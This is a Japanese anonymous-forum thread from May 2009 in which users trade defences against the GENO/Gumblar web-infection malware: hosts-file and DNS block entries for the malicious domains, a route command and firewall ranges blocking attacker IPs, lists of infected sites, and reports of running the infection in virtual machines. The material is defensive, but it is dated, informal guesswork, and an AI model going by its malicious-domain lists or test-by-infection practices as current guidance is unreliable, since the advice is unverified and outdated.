ありがとうございます
907 :192.168.0.774:2009/05/18(月) 13:34:56 ID:iven4hyc0
【緊急】ウイルス感染について2009年5月16日 投稿者: 雪町灯之助
sprnv。xii。jp/
doris。xii。jp/
から始まるURLにアクセスなさらないようによろしくお願いいたします。
sprnv。xii。jp/
doris。xii。jp/
から始まるURLにアクセスなさらないようによろしくお願いいたします。
908 :192.168.0.774:2009/05/18(月) 13:35:41 ID:DLMrt4rx0
ファイアウォールの設定よりhostsのがよほどわかりやすいと思うけどなぁ
突っ込めば遮断なんて死ぬほど明解
突っ込めば遮断なんて死ぬほど明解
909 :192.168.0.774:2009/05/18(月) 13:36:58 ID:JmCcr4Q60
>>905
ネトゲ関係で垢ハック流行ってるから中国韓国台湾はデフォで全部弾いてるな(PG2利用)
ネトゲ関係で垢ハック流行ってるから中国韓国台湾はデフォで全部弾いてるな(PG2利用)
910 :192.168.0.774:2009/05/18(月) 13:37:43 ID:ua7Ctj4Z0
(スクリプト確認:管理者にメール済み)
p://www■geocities■jp/themusasi/
p://www■geocities■jp/themusasi2/
(同じ管理者と思われるがスクリプトなし)
p://www■geocities■jp/themusasi2de/
p://www■geocities■jp/themusasi4/
(他のスレで感染サイトとして出ていたが、スクリプト見当たらず。ガセ)
p://zaq■ne■jp
p://okwave■jp/qa1152486■html
p://www■geocities■jp/themusasi/
p://www■geocities■jp/themusasi2/
(同じ管理者と思われるがスクリプトなし)
p://www■geocities■jp/themusasi2de/
p://www■geocities■jp/themusasi4/
(他のスレで感染サイトとして出ていたが、スクリプト見当たらず。ガセ)
p://zaq■ne■jp
p://okwave■jp/qa1152486■html
911 :192.168.0.774:2009/05/18(月) 13:38:23 ID:wU1qChfhP
912 :192.168.0.774:2009/05/18(月) 13:40:20 ID:ua7Ctj4Z0
913 :192.168.0.774:2009/05/18(月) 13:44:13 ID:ua7Ctj4Z0
>>908
IP遮断:ドメイン名で書かれていても、IPの数字でも遮断する。
DDNSなどで、ドメイン名に割当てられているIPが変化すると、同じ名前のサイトでもブロックできないことがある。
hosts:DNSサーバーより優先して参照され、ドメイン→IPへの変換を行なう。
登録してあれば、該当サイトの代わりに自PC(もしくは登録してある別のIP)を見に行くようになる。
安全のためには、両方設定しておくのが基本。
>>909
(・∀・)人(・∀・)ナカーマ
IP遮断:ドメイン名で書かれていても、IPの数字でも遮断する。
DDNSなどで、ドメイン名に割当てられているIPが変化すると、同じ名前のサイトでもブロックできないことがある。
hosts:DNSサーバーより優先して参照され、ドメイン→IPへの変換を行なう。
登録してあれば、該当サイトの代わりに自PC(もしくは登録してある別のIP)を見に行くようになる。
安全のためには、両方設定しておくのが基本。
>>909
(・∀・)人(・∀・)ナカーマ
914 :192.168.0.774:2009/05/18(月) 13:44:30 ID:rNK1DQEo0
915 :192.168.0.774:2009/05/18(月) 13:45:06 ID:oyOEXJA00
916 :192.168.0.774:2009/05/18(月) 13:47:15 ID:+OaLYMxp0
>>883
zlkon.lv時代はIPで投下されていたから
hostsへの記載は無駄な気もする。
>>908
ワイルドカード使えないのがな…。example.comを書いても
foo.example.comやbar.example.comは阻止できない。
zlkon.lv時代はIPで投下されていたから
hostsへの記載は無駄な気もする。
>>908
ワイルドカード使えないのがな…。example.comを書いても
foo.example.comやbar.example.comは阻止できない。
917 :192.168.0.774:2009/05/18(月) 13:49:11 ID:iven4hyc0
>>912
THX!
THX!
918 :192.168.0.774:2009/05/18(月) 13:49:26 ID:wWVwQ3nP0
検証の方、乙です。
自分のノートパソコンもどうやら餌食になってしまったみたいなので、
現在バックアップとってリカバリー準備中です。
大分落ち着いてきたぞ!
自分のノートパソコンもどうやら餌食になってしまったみたいなので、
現在バックアップとってリカバリー準備中です。
大分落ち着いてきたぞ!
919 :192.168.0.774:2009/05/18(月) 13:51:10 ID:PjPI1FGb0
確かにIPレベルで通信されたらhostsに書いてても意味無いね。
FWで止める方が確実か。
FWで止める方が確実か。
920 :192.168.0.774:2009/05/18(月) 13:52:18 ID:lbjdJxFz0
hosts fw ルータ の3段で防げばかなり強固
921 :192.168.0.774:2009/05/18(月) 13:53:48 ID:XBZCbjSj0
.cn全弾きってできないの?
922 :192.168.0.774:2009/05/18(月) 13:55:28 ID:oyOEXJA00
こんな方法もある。
route -p add 95.129.144.0 mask 255.255.254.0 127.0.0.1
route -p add 95.129.144.0 mask 255.255.254.0 127.0.0.1
923 :192.168.0.774:2009/05/18(月) 14:01:55 ID:JmCcr4Q60
>>920
その三段構えが鉄板だね。こまめにメンテしなきゃ意味無いけどw
その三段構えが鉄板だね。こまめにメンテしなきゃ意味無いけどw
ウィンドウズモバイルで怪しいサイト踏むって言ってた者だけど
http://genolists.alink.uic.to/
にあるサイト片っ端から行ってみた。
結果
とりあえず問題ないっぽいが、接続切ってブラウザ閉じた後に2回ほど携帯が勝手に接続しようとして失敗した旨のエラーメッセージ確認。
携帯自身のエラーなのかウィルスなのかわからんのでなんともいえん。
ウィンドウズOSの入った機械でアクセスするのは控えたほうがいいかもしれん。
皆さんの協力感謝です。
あと、仮眠とった後PCにWin7をクリーンインスコ&イーモバイルで再接続したからID変わってるかも
これで自分の人柱報告は終わろうと思います。
http://genolists.alink.uic.to/
にあるサイト片っ端から行ってみた。
結果
とりあえず問題ないっぽいが、接続切ってブラウザ閉じた後に2回ほど携帯が勝手に接続しようとして失敗した旨のエラーメッセージ確認。
携帯自身のエラーなのかウィルスなのかわからんのでなんともいえん。
ウィンドウズOSの入った機械でアクセスするのは控えたほうがいいかもしれん。
皆さんの協力感謝です。
あと、仮眠とった後PCにWin7をクリーンインスコ&イーモバイルで再接続したからID変わってるかも
これで自分の人柱報告は終わろうと思います。
925 :192.168.0.774:2009/05/18(月) 14:03:02 ID:t3VCyTRM0
FWはZoomAlearmでおk?
926 :192.168.0.774:2009/05/18(月) 14:05:47 ID:j9Y4xggD0
>>922
ルーティングテーブルか、その方法もあったな
ルーティングテーブルか、その方法もあったな
927 :192.168.0.774:2009/05/18(月) 14:07:26 ID:oyOEXJA00
>>926
この方法なら、とりあえずソフトいらないよ。
この方法なら、とりあえずソフトいらないよ。
928 :192.168.0.774:2009/05/18(月) 14:09:16 ID:lXGw6ssR0
adobe readerのアップデートが8.15で最新になるんですが
最新版は9ですよね?
最新版は9ですよね?
929 :192.168.0.774:2009/05/18(月) 14:11:40 ID:UxU4hqfi0
930 :192.168.0.774:2009/05/18(月) 14:12:44 ID:oyOEXJA00
931 :192.168.0.774:2009/05/18(月) 14:16:20 ID:oMiyEi290
うちはDNSサーバにダミーエントリいれて、サブドメインごとまとめてブロックした
zone "zlkon.lv" {
type master;
file "zone\block.zone";
};
zone "gumblar.cn" {
type master;
file "zone\block.zone";
};
zone "martuz.cn" {
type master;
file "zone\block.zone";
};
zone "zlkon.lv" {
type master;
file "zone\block.zone";
};
zone "gumblar.cn" {
type master;
file "zone\block.zone";
};
zone "martuz.cn" {
type master;
file "zone\block.zone";
};
932 :192.168.0.774:2009/05/18(月) 14:16:36 ID:lXGw6ssR0
933 :192.168.0.774:2009/05/18(月) 14:18:39 ID:pVOaBjI60
Adobe Flash Playerがアップデートできないんですが
これはアップデート時はActiveXやJavaScriptを有効にしないといけないんでしょうか
これはアップデート時はActiveXやJavaScriptを有効にしないといけないんでしょうか
934 :192.168.0.774:2009/05/18(月) 14:18:52 ID:k2CI1leb0
これ、本当かね?
あとで検証してみるか。
671 名無しさん@お腹いっぱい。 sage 2009/05/18(月) 14:15:47 ID:
>>617
これVMで踏んでみたけど、確かに軽くなってるし、コマンドプロンプトも
レジストリエディタも立ち上がる。
chmファイルはなにやら更新されていく。
あとで検証してみるか。
671 名無しさん@お腹いっぱい。 sage 2009/05/18(月) 14:15:47 ID:
>>617
これVMで踏んでみたけど、確かに軽くなってるし、コマンドプロンプトも
レジストリエディタも立ち上がる。
chmファイルはなにやら更新されていく。
935 :192.168.0.774:2009/05/18(月) 14:19:48 ID:j9Y4xggD0
>>931
自前のDNSサーバーを持ってるってこと?
自前のDNSサーバーを持ってるってこと?
936 :192.168.0.774:2009/05/18(月) 14:21:14 ID:oyOEXJA00
937 :192.168.0.774:2009/05/18(月) 14:21:28 ID:XTSMt63n0
>>922
なるほどねぇ。ありがとうございます。
なるほどねぇ。ありがとうございます。
938 :192.168.0.774:2009/05/18(月) 14:23:58 ID:k2CI1leb0
939 :192.168.0.774:2009/05/18(月) 14:26:12 ID:hvJT/vJv0
こういう騒動がある度に覗くけど
お前らすげえな素人の俺にはさっぱりだ
お前らすげえな素人の俺にはさっぱりだ
940 :192.168.0.774:2009/05/18(月) 14:28:17 ID:oyOEXJA00
>>938
hosts も DNS も正引きは同じだからね。
DNS は、逆引きも設定できるけど。
IP アドレスで指定されたら、DNS やドメインによる制御は役に
たたないから、ルーティングとかF/Wで 95.129.144.0/23 への
アクセスを止めてしまった方が、現在のところは有効な気がする。
hosts も DNS も正引きは同じだからね。
DNS は、逆引きも設定できるけど。
IP アドレスで指定されたら、DNS やドメインによる制御は役に
たたないから、ルーティングとかF/Wで 95.129.144.0/23 への
アクセスを止めてしまった方が、現在のところは有効な気がする。
941 :192.168.0.774:2009/05/18(月) 14:32:22 ID:PjPI1FGb0
ただ、接続先IP変える位なら簡単に出来るだろうから、
どちらにしても、しばらく情報収集して無いと怖いね。
どちらにしても、しばらく情報収集して無いと怖いね。
942 :192.168.0.774:2009/05/18(月) 14:32:56 ID:wU1qChfhP
一般に役に立たないレスは控えた方がいいじゃないか
DNSサーバーで対策なんて普通ありえんw
DNSサーバーで対策なんて普通ありえんw
943 :192.168.0.774:2009/05/18(月) 14:33:37 ID:abbvkkL50
今日初めてhostsを知った情弱の俺でも、hostsをいじる事ができた。
これはPC詳しくない人間にはやりやすい対策かもしれないね。
これはPC詳しくない人間にはやりやすい対策かもしれないね。
944 :192.168.0.774:2009/05/18(月) 14:36:14 ID:k2CI1leb0
>>942
逆に、ヤバ気なところを片っ端から登録したDNSを立てて、
それを使ってもらうというのもありかもしれん。
って、たぶんgnome氏が「身内」に提供してるのがまさに
そういうもんなんだろうな。
逆に、ヤバ気なところを片っ端から登録したDNSを立てて、
それを使ってもらうというのもありかもしれん。
って、たぶんgnome氏が「身内」に提供してるのがまさに
そういうもんなんだろうな。
945 :192.168.0.774:2009/05/18(月) 14:37:31 ID:j9Y4xggD0
>>943
XPは簡単にできるけれどVistaはアクセス権がらみで手軽に書き換えられないよ
XPは簡単にできるけれどVistaはアクセス権がらみで手軽に書き換えられないよ
946 :192.168.0.774:2009/05/18(月) 14:39:03 ID:t3VCyTRM0
hosts煽ったのなんて広告ブロック以来だ
947 :192.168.0.774:2009/05/18(月) 14:39:27 ID:PjPI1FGb0
948 :192.168.0.774:2009/05/18(月) 14:40:01 ID:oMiyEi290
Vista使いだけど、普段は一般ユーザーで使ってるから、ウイルスやワームにやられても
システム書き換えられないようにしてる
hostsファイル書き換えるときは、「メモ帳」を管理者権限で起動して、hostsファイル開いて書き換える
システム書き換えられないようにしてる
hostsファイル書き換えるときは、「メモ帳」を管理者権限で起動して、hostsファイル開いて書き換える
949 :192.168.0.774:2009/05/18(月) 14:41:07 ID:xKiO8GiH0
950 :192.168.0.774:2009/05/18(月) 14:41:29 ID:oMiyEi290
951 :192.168.0.774:2009/05/18(月) 14:44:33 ID:k2CI1leb0
>>945
こんなんでどうだろう。
Vistaでhostsを編集する方法
スタートメニュー→すべてのプログラム→アクセサリ→メモ帳
の上で右クリック
「管理者として実行」を選択
「ファイル」メニュー→「開く」
ファイルの種類を「テキスト文書(*.txt)」から「すべてのファイル(*.*)」に変更
C:\Windows\System32\drivers\etc\hosts
を開く
以下の行を追加し、保存終了
# GENOウイルス対策5月18日
0.0.0.0 zlkon.lv
0.0.0.0 gumblar.cn
0.0.0.0 martuz.cn
こんなんでどうだろう。
Vistaでhostsを編集する方法
スタートメニュー→すべてのプログラム→アクセサリ→メモ帳
の上で右クリック
「管理者として実行」を選択
「ファイル」メニュー→「開く」
ファイルの種類を「テキスト文書(*.txt)」から「すべてのファイル(*.*)」に変更
C:\Windows\System32\drivers\etc\hosts
を開く
以下の行を追加し、保存終了
# GENOウイルス対策5月18日
0.0.0.0 zlkon.lv
0.0.0.0 gumblar.cn
0.0.0.0 martuz.cn
952 :192.168.0.774:2009/05/18(月) 14:46:04 ID:k2CI1leb0
953 :192.168.0.774:2009/05/18(月) 14:46:49 ID:j9Y4xggD0
954 :192.168.0.774:2009/05/18(月) 14:50:12 ID:j9Y4xggD0
>>948
加えてバッファ オーバーフロー対策にどうですか
XPSP2以上用の解説ですがVistaも同様です
ttp://support.microsoft.com/kb/889741/ja
(通常で不安定なPCにはおすすめでないですが)
加えてバッファ オーバーフロー対策にどうですか
XPSP2以上用の解説ですがVistaも同様です
ttp://support.microsoft.com/kb/889741/ja
(通常で不安定なPCにはおすすめでないですが)
皆さんに質問。テンプレセキュリティサイトの焼却炉の数字をPG2に登録したんですけど
焼却炉の数字を数字を登録するでGENO対策になってますよね?
焼却炉の数字を数字を登録するでGENO対策になってますよね?
956 :192.168.0.774:2009/05/18(月) 14:53:50 ID:ua7Ctj4Z0
p://park17■wakwak■com/~kitagawadaisuke/
感染を確認。HP管理者の連絡先不明のため、サーバー管理者に連絡済み。
感染を確認。HP管理者の連絡先不明のため、サーバー管理者に連絡済み。
957 :192.168.0.774:2009/05/18(月) 14:57:07 ID:eM8L/6820
85.214.90.254 これどうするかなぁ・・独り言
めんどくさいから全焼きしとくか
85.214.16.0 - 85.214.139.255
85.214.0.0/16
めんどくさいから全焼きしとくか
85.214.16.0 - 85.214.139.255
85.214.0.0/16
958 :192.168.0.774:2009/05/18(月) 14:59:08 ID:dRkGHa1G0
>>955
リストとしてきちんと登録されていれば現状は対策になっていると思うよ
リストとしてきちんと登録されていれば現状は対策になっていると思うよ
959 :192.168.0.774:2009/05/18(月) 14:59:34 ID:ImVScTUk0
XP SP3遣いっす。
不安なんで教えてください。
C:\WINDOWS\system32\drivers\etcにあるhostファイルの最後に
#090518 zlkon, GENO malware
127.0.0.1 zlkon.lv
127.0.0.1 gumblar.cn
127.0.0.1 gumlar.cn
127.0.0.1 martuz.cn
127.0.0.1 findyourbigwhy.cn
127.0.0.1 bigtopsuper.cn
を追加しときました。
これでhostsファイルはおっけーですか?
不安なんで教えてください。
C:\WINDOWS\system32\drivers\etcにあるhostファイルの最後に
#090518 zlkon, GENO malware
127.0.0.1 zlkon.lv
127.0.0.1 gumblar.cn
127.0.0.1 gumlar.cn
127.0.0.1 martuz.cn
127.0.0.1 findyourbigwhy.cn
127.0.0.1 bigtopsuper.cn
を追加しときました。
これでhostsファイルはおっけーですか?
960 :192.168.0.774:2009/05/18(月) 15:02:13 ID:8q4bxpc+0
>>951
ありがとう!
昨日半年ぶりくらいにログインしたmixiにGENOの事書いたら
腐の方達からすごい質問攻め
「自分もよく解らないのでまとめwiki見たほうがいいですよ」と返信したら
二人程から
「なら書くな!」
と
泣いていい?
ありがとう!
昨日半年ぶりくらいにログインしたmixiにGENOの事書いたら
腐の方達からすごい質問攻め
「自分もよく解らないのでまとめwiki見たほうがいいですよ」と返信したら
二人程から
「なら書くな!」
と
泣いていい?
961 :192.168.0.774:2009/05/18(月) 15:02:24 ID:BZ5+cjSr0
>>454
それ英語版ファイルだから無問題ってことで俺の中では脳内変換されてる。
それ英語版ファイルだから無問題ってことで俺の中では脳内変換されてる。
962 :192.168.0.774:2009/05/18(月) 15:04:56 ID:BZ5+cjSr0
963 :192.168.0.774:2009/05/18(月) 15:05:24 ID:k2CI1leb0
>>960
なんかよくわからんが、存分に泣くがいい。
なんかよくわからんが、存分に泣くがいい。
964 :192.168.0.774:2009/05/18(月) 15:05:43 ID:gw0F+TVl0
>>960
www
www
965 :192.168.0.774:2009/05/18(月) 15:07:07 ID:xKJ07MeN0
>>960
怖いのう怖いのう
怖いのう怖いのう
966 :192.168.0.774:2009/05/18(月) 15:08:01 ID:wU1qChfhP
>>960の人気に嫉妬
967 :192.168.0.774:2009/05/18(月) 15:08:46 ID:t3VCyTRM0
>>960
一緒に泣いてやるよ
一緒に泣いてやるよ
968 :192.168.0.774:2009/05/18(月) 15:09:50 ID:oMiyEi290
>>954
普段は一般ユーザーで利用、DEPは全アプリでオン、IE8は保護モード動作、と一通りやってますよ
普段は一般ユーザーで利用、DEPは全アプリでオン、IE8は保護モード動作、と一通りやってますよ
969 :192.168.0.774:2009/05/18(月) 15:10:14 ID:8q4bxpc+0
970 :192.168.0.774:2009/05/18(月) 15:10:37 ID:ImVScTUk0
971 :192.168.0.774:2009/05/18(月) 15:11:42 ID:qG7NJCuDO
おー ウイルスリンク集続々と集まってるね
俺も帰ったらサブPCで怪しいとこ特攻するわ
同人は東方とボーカロイドが特に危ないんだよな?
俺も帰ったらサブPCで怪しいとこ特攻するわ
同人は東方とボーカロイドが特に危ないんだよな?
972 :192.168.0.774:2009/05/18(月) 15:15:35 ID:v0TdaQEv0
今までセキュリティはソフトにおまかせだけだったので、先人の皆さんに感謝です。
>>2の1.から4.までは比較的楽にできました。
「5.危険IPのブロック」はレスを参考に以下のようにやってみました。
hostsに3つのドメインを127.0.0.1で入れ、さらにIPでもはじくようにと思い、
ググってリンクたどって一番分かりやすかったのが・・・
「Kaspersky Internet Security 2009 通信を遮断するアドレスを範囲指定する方法」
自分がカスペ最近使い始めたのもあるんですが、これを見ながら
94.229.64.0/20(zlkon.lvに割り当てられていた範囲)と
95.129.144.0/23(martuz.cnとgumblar.cnに割り当てられていた範囲)を
カスペにFW設定してみました。
findyourbigwhy.cnとbigtopsuper.cnはカスペでドメイン名のFW遮断設定だけしましたが、
IP範囲ではどういう設定すべきか、>>957さん同様考え中です。
>>2の1.から4.までは比較的楽にできました。
「5.危険IPのブロック」はレスを参考に以下のようにやってみました。
hostsに3つのドメインを127.0.0.1で入れ、さらにIPでもはじくようにと思い、
ググってリンクたどって一番分かりやすかったのが・・・
「Kaspersky Internet Security 2009 通信を遮断するアドレスを範囲指定する方法」
自分がカスペ最近使い始めたのもあるんですが、これを見ながら
94.229.64.0/20(zlkon.lvに割り当てられていた範囲)と
95.129.144.0/23(martuz.cnとgumblar.cnに割り当てられていた範囲)を
カスペにFW設定してみました。
findyourbigwhy.cnとbigtopsuper.cnはカスペでドメイン名のFW遮断設定だけしましたが、
IP範囲ではどういう設定すべきか、>>957さん同様考え中です。
973 :192.168.0.774:2009/05/18(月) 15:18:40 ID:ihTs5Cw90
974 :192.168.0.774:2009/05/18(月) 15:19:28 ID:9Pl8YtKN0
>>969
謎の文字列はまだかね?
謎の文字列はまだかね?
975 :192.168.0.774:2009/05/18(月) 15:20:58 ID:j9Y4xggD0
976 :192.168.0.774:2009/05/18(月) 15:22:25 ID:LQfReDty0
同人サイトって、同人誌出してるような絵描きのサイトのことなのか?
977 :192.168.0.774:2009/05/18(月) 15:26:15 ID:oyOEXJA00
978 :192.168.0.774:2009/05/18(月) 15:27:31 ID:AGzlLrAA0
>>5
カスペでも検知できるって聞いたんだけどavastの方がいいの?
カスペでも検知できるって聞いたんだけどavastの方がいいの?
979 :192.168.0.774:2009/05/18(月) 15:27:45 ID:jXgQJsa10
デルのPC XPで感染してしまったようです。
再インストールしたかったのですが、セットアップ途中で反応無し
デルのサポートセンターの答えは、HD故障の疑いで現在検査中
1時間くらい掛かるということでしたが、5時間半経過でまだ56%
感染&HD故障がたまたま重なったと言うことなのでしょうか?
再インストールしたかったのですが、セットアップ途中で反応無し
デルのサポートセンターの答えは、HD故障の疑いで現在検査中
1時間くらい掛かるということでしたが、5時間半経過でまだ56%
感染&HD故障がたまたま重なったと言うことなのでしょうか?
980 :192.168.0.774:2009/05/18(月) 15:27:48 ID:gw0F+TVl0
通称「GENOウイルス」・同人サイト向け対策まとめ
ttp://www31.atwiki.jp/doujin_vinfo/pages/24.html
にある
ウイルスバスター2009(ver.17.1.1251)のファイアウォール設定
ですが
ttp://esupport.trendmicro.co.jp/Pages/JP-2063926.aspx
の注意書きにある
注意:
例外ルール設定に、トロイの木馬が使用するプロトコルとポート番号を設定した場合については
トロイの木馬アタックを防ぐことができません。
例外ルール設定の追加に関しましては、お客様の自己責任でおこなっていただきますよう
お願いいたします。
のとおりトロイの木馬は防げませんってサポートが言ってました
ttp://www31.atwiki.jp/doujin_vinfo/pages/24.html
にある
ウイルスバスター2009(ver.17.1.1251)のファイアウォール設定
ですが
ttp://esupport.trendmicro.co.jp/Pages/JP-2063926.aspx
の注意書きにある
注意:
例外ルール設定に、トロイの木馬が使用するプロトコルとポート番号を設定した場合については
トロイの木馬アタックを防ぐことができません。
例外ルール設定の追加に関しましては、お客様の自己責任でおこなっていただきますよう
お願いいたします。
のとおりトロイの木馬は防げませんってサポートが言ってました
981 :192.168.0.774:2009/05/18(月) 15:27:50 ID:oyOEXJA00
982 :192.168.0.774:2009/05/18(月) 15:34:43 ID:k2CI1leb0
さっきから最新?のGenoを飼ってるんだけど、>>401あたりからの情報通り、
普通にオペレーションできてしまう。
qlsodbc.chm以外にわかりやすい判定方法がないぞ、これ。
しばらく動かしたままにしてるんだけど、サイズは1,323バイトのまま変化せず。
中身はASCIIテキストで謎の文字列。
サイズが変わったとかハッシュがどうこうではなく、chmファイルをダブルクリック
して開けなければ感染してる。
別のVMで他のサイトから感染させてみて、文字列が変わるかどうか調べてみるか。
普通にオペレーションできてしまう。
qlsodbc.chm以外にわかりやすい判定方法がないぞ、これ。
しばらく動かしたままにしてるんだけど、サイズは1,323バイトのまま変化せず。
中身はASCIIテキストで謎の文字列。
サイズが変わったとかハッシュがどうこうではなく、chmファイルをダブルクリック
して開けなければ感染してる。
別のVMで他のサイトから感染させてみて、文字列が変わるかどうか調べてみるか。
983 :192.168.0.774:2009/05/18(月) 15:41:11 ID:+lw3mpsu0
FTPしないとサイズ変わらないのかな。
どこかの anonymous サーバにテストFTPしてみるとかどうだろう?
どこかの anonymous サーバにテストFTPしてみるとかどうだろう?
984 :192.168.0.774:2009/05/18(月) 15:45:21 ID:j9Y4xggD0
>>980
トロイの木馬が使用するプロトコルとポート番号を(例外ルールで通信の許可)設定した場合は防げないってことでは?
ファイル共有などで誤って、トロイの木馬ポートを許可設定した場合だと思うけれどどうだろう
トロイの木馬が使用するプロトコルとポート番号を(例外ルールで通信の許可)設定した場合は防げないってことでは?
ファイル共有などで誤って、トロイの木馬ポートを許可設定した場合だと思うけれどどうだろう
985 :192.168.0.774:2009/05/18(月) 15:50:31 ID:8GKrEP5/O
ちょwwwwwww手ぶろ感染ってまじ?wwwwwww
986 :192.168.0.774:2009/05/18(月) 15:50:51 ID:ua7Ctj4Z0
p://pmpk■dojin■com 感染報告のメールに対し、対応完了の返答あり。完了してるかの確認まではやってない。
987 :192.168.0.774:2009/05/18(月) 15:51:00 ID:BEaSjZsm0
genoに感染、再起動後にregeditを起動しようとしてもエクスプローラー再起動みたくなって
起動できないけど
regedit.exeをa.exeのような適当な名前に変えて実行すると正常に起動できる
その後、ファイル名を元のregedit.exeに戻しても普通に起動できるようになった
起動できないけど
regedit.exeをa.exeのような適当な名前に変えて実行すると正常に起動できる
その後、ファイル名を元のregedit.exeに戻しても普通に起動できるようになった
988 :192.168.0.774:2009/05/18(月) 15:52:34 ID:k2CI1leb0
>>983
それはやってる。別のVMのftpサーバにアクセスしたけど、変わらない。
sniffingツール等の有無を確認して動作を停止してしまうのかもしれない。
あるいはデバイスを見てVMで実行していることを検知して動作を停止して
いるのかも。
妙に軽く動くのは、このウィルス本来の動作を行っていないからという
可能性がある。
とりあえずすっぴんのVMで試してみて、駄目ならネットブックでも
使ってみようかと。
それはやってる。別のVMのftpサーバにアクセスしたけど、変わらない。
sniffingツール等の有無を確認して動作を停止してしまうのかもしれない。
あるいはデバイスを見てVMで実行していることを検知して動作を停止して
いるのかも。
妙に軽く動くのは、このウィルス本来の動作を行っていないからという
可能性がある。
とりあえずすっぴんのVMで試してみて、駄目ならネットブックでも
使ってみようかと。
989 :192.168.0.774:2009/05/18(月) 15:53:34 ID:o7Ns7JFwP
>>969
mixiこわい
mixiこわい
990 :192.168.0.774:2009/05/18(月) 15:55:49 ID:BEaSjZsm0
>>986
パンプキン日記内のgenoスクリプト消し忘れているようだ
パンプキン日記内のgenoスクリプト消し忘れているようだ
991 :192.168.0.774:2009/05/18(月) 15:57:52 ID:k2CI1leb0
>>987
それは実機?
それは実機?
992 :192.168.0.774:2009/05/18(月) 15:59:16 ID:gw0F+TVl0
993 :192.168.0.774:2009/05/18(月) 16:00:05 ID:BEaSjZsm0
>>991
仮想
仮想
994 :192.168.0.774:2009/05/18(月) 16:00:30 ID:wU1qChfhP
995 :192.168.0.774:2009/05/18(月) 16:04:13 ID:k2CI1leb0
>>993
そっか。ってことは別種なのかな。こっちはregeditもExplorerもcmd.exeも
普通に動く。
>>994
実際、ラボでの検証をすり抜けるために、VM特有のデバドラをチェックする
ウィルスがあるらしいからねぇ。
そっか。ってことは別種なのかな。こっちはregeditもExplorerもcmd.exeも
普通に動く。
>>994
実際、ラボでの検証をすり抜けるために、VM特有のデバドラをチェックする
ウィルスがあるらしいからねぇ。
996 :192.168.0.774:2009/05/18(月) 16:07:25 ID:r4h+PdSAO
手ブロが感染とは、どこのスレがソースですか
997 :192.168.0.774:2009/05/18(月) 16:07:37 ID:BZ5+cjSr0
この件で何の役にも立たない俺だけど、次スレ立ててくるわ
998 :192.168.0.774:2009/05/18(月) 16:08:27 ID:Re7/n4dW0
>>996
情弱の同人板では問題ないと判断されてた
情弱の同人板では問題ないと判断されてた
999 :192.168.0.774:2009/05/18(月) 16:08:42 ID:j9Y4xggD0
>>992
萌え萌えなお姉さんだ・・・
萌え萌えなお姉さんだ・・・
1000 :192.168.0.774:2009/05/18(月) 16:09:05 ID:rNK1DQEo0
>>996
VIP
VIP
1001 :1001:
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。
もう書けないので、新しいスレッドを立ててくださいです。。。